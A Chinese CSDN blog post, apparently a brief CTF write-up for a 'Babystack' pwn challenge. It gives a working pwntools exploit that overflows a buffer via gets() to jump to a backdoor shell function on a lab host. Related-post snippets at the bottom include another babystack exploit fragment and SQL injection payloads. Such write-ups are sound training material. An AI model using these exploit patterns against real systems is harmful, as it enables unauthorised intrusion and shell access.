【CTF-Crypto实战-2023红队】Babystack

Cra_Thursday9527

已于 2023-07-28 10:26:02 修改

阅读量144

点赞数

分类专栏： CTF类比赛实战文章标签：网络安全汇编 python

于 2023-07-28 10:22:37 首次发布

本文链接：https://blog.csdn.net/Cra_Thursday9527/article/details/131974874

版权

CTF类比赛实战专栏收录该内容

4 篇文章 0 订阅

订阅专栏

首先检查安全性

发现后门函数

发现溢出点get

溢出buffer覆盖ebp+4地址段为shell 入口地址即可即可完成

from pwn import *
context.arch = 'i386'
#io = process("./pp")
io = remote("172.16.30.11",18006)
#网络延迟较大，加上较好
pause()
p = flat(b'a'*0x2c, 0x8048486)
io.sendline(p) 
io.interactive()

改为远程调试io = remote(“172.16.30.11”,18006)

拿下

优惠劵

Cra_Thursday9527

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
【CTF-Crypto实战-2023红队】Babystack

改为远程调试io = remote(“172.16.30.11”,18006)溢出buffer覆盖ebp+4地址段为shell 入口地址即可即可完成。
复制链接

扫一扫

专栏目录

BUUCTF|PWN-bjdctf_2020_babystack2-WP

l2645470582_的博客

11-09

379

1.例行检查保护机制 2.我们用64位的IDA打开该文件 shift+f12查看关键字符串，我们看到关键字符串"/bin/sh" 然后我们找到后门函数的地址：backdoor_addr = 0x0400726 3.我们看看main函数里面的内容我们看到第一个nbytes是有符号数，第二个nbytes就变成了无符号数我们判断这是一个整数溢出所以 -1 = 4294967295 4.EXP #encoding = utf-8 fr...

0ctf2018-babystack_writeup

CabbageWind的博客

08-17

849

题目：0ctf2018-babystack 检查保护机制：可以看到程序只提供了NX保护。在IDA中进行反编译，发现一个可读的位置，存在栈溢出漏洞，可能可以利用：使用peda计算read位置的偏移：得到read位置距离返回地址的偏移为44，比read的长度0x40小，说明栈溢出漏洞可直接被利用。查看文件ELF表通过elf表中查看得知程序中不存在system函数，无法直接跳转；也不存在输出函数，无法打印got表地址。查看vmmap 通过vmmap可以看到bss段可

1 条评论您还未登录，请先登录后发表或查看评论

XSCTF联合招新赛（热身赛）babystack & easyrop

红叶的博客

10-29

1591

开启了栈不可执行，但是在 IDA Pro 中发现了backdoor函数。

[原题复现]-HITCON 2016 WEB《babytrick》[反序列化]

笑花大王

01-31

542

前言不想复现的可以访问榆林学院信息安全协会CTF训练平台找到此题直接练手 HITCON 2016 WEB -babytrick（复现）原题 index.php 1 <?php 2 3 include "config.php"; 4 5 class HITCON{ 6 private $method; 7 private $...

[CTF]简单的sql注入之3

胖胖的ALEX

06-25

827

类型：web 网址：http://www.shiyanbar.com/ctf/1909 攻击：sql注入一句话总结： id报错注入（手工）猜数据库名的长度： id=1’ and length(database())=4 – 1 数据库名的长度是4 猜数据库名(burpsuite)： id=1’ and ascii(mid(database(),1,1))=119 – 1 id=1’ and a...

【CTF-Crypto实战-2023红队】从乱码.txt文件获取flag

Cra_Thursday9527的博客

07-27

2098

复制该文本，用瑞士军刀打开，Output右边出现一个魔术棒，说明自动识别出了加密方式与编码字符集，点击魔术棒，得到flag。这次拿到的题目中只有一个.txt文件，直接双击打开文本后发现一堆啥也不是的东西。尝试各种直接解码无果后，用winhex查看二进制，发现其中几乎全是字母。推测该.txt文件存在编码问题，于是尝试用sublime打开。去掉所有回车（word也行）

Backdoor-CTF-Crypto-400.rar

09-30

Backdoor-CTF-Crypto-400.rar

CTF-misc工具2-CTF-Tools-masterV1.3.7

08-17

CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。使用场景: 在CTF竞赛...

ctf-2017-release:BSidesSF CTF 2017版本

05-28

ctf-2017 2017 BSidesSF CTF面临的挑战内置的，，，，在本地应对挑战您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供，基于...

buuctf actf_2019_babystack

weixin_45441024的博客

12-07

482

buuctf actf_2019_babystack from pwn import * from LibcSearcher import LibcSearcher r = remote("node3.buuoj.cn",27848) elf = ELF("/home/pwn/Desktop/ACTF_2019_babystack") nbytes_length = 0xE0 offset = 0xD0 leave_retn = 0x00400A4E puts_got = elf.got["puts"]

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8230

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

鸿蒙内核源码分析 (内核启动篇) | 从汇编到 main ()

maniuT的博客

05-14

835

这应该是系列篇最难写的一篇，全是汇编代码，需大量的底层知识，涉及协处理器，内核镜像重定位，创建内核映射表，初始化模式栈，热启动，到最后熟悉的。

【多电压流程 Multivoltage Flow】- 6.术语汇编

QRBQ

05-14

174

**power switch**：可以为芯片的一部分开关电源的晶体管或晶体管阵列，可以在VDD电源（头开关）或GND（脚开关）处切断电源，从而在不活动期间切断芯片部分的电源。所有这些单元共享相同的电源轨。- **RTL**：寄存器传输级，一种用硬件描述语言（如Verilog或VHDL）编写的数字电路的高级描述，以寄存器之间的数据传输和对数据执行的逻辑操作来表达。- **coarse-grain switching**：一种电源切换策略，对整个块的电源进行开关控制，块内所有晶体管共享一个单一的电源开关。

【Python】Python中变量或者函数加下划线‘_‘的含义

yangweipeng708的博客

05-14

675

理解这些约定可以帮助Python开发者编写更清晰、更Pythonic的代码，并理解其他Python代码中的命名习惯。）通常用来指示特定的编程约定或用法，这些约定主要关乎变量和函数的可访问性以及预期的使用范围。在Python中，变量或函数前面加一个下划线（

python数据分析numpy基础之intersect1d求数组交集

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交